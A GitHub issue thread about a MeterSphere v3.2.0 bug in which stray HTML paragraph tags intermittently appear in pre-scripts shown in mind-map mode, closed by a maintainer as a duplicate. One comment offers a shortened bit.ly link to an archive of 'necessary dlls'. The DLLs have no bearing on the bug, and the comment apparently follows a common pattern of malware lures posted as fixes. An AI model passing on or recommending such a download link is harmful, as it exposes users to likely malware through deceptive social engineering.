### ISSUE TITLE
[BUG]v3.2.0，有用户反馈脑图模式下，前置脚本会多出“<p style=""> </p>” 这样的前端内容。

### ISSUE THREAD

**Issue by 35plus** [metersphere/metersphere#33193]
### 联系方式

王进

### MeterSphere 版本

v3.2

### 使用外置数据库

否

### 问题描述

v3.2.0，有用户反馈脑图模式下，前置脚本会多出<p style="">用户名在系统中存在</p>
如下图所示：
<img width="795" alt="1726740896103" src="https://github.com/user-attachments/assets/13269bd0-c6aa-402c-a08e-4db377570ea9">

### 重现步骤

测试了几遍，没能复现出来。 但是在东区的交付环境，看到了这个现象，客户的环境也有。
1. 东区环境：
<img width="677" alt="1726741024163" src="https://github.com/user-attachments/assets/9d28a1b2-eb5b-4f8d-8392-b8b83cc27505">

2. 用户反馈的：
![be91790a39af9908e0daa334e63d444](https://github.com/user-attachments/assets/c8b99e99-8cbc-4644-9b10-65b26006bbb3)

3. 切换到Web页面看不到<p style="">，我们东区的环境还有客户的环境，都没有。偶现的问题。

**Comment by Aljallaf100** [comment]
try this
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive

**Comment by youliyuan-fit2cloud** [comment]
Duplicate of #32333
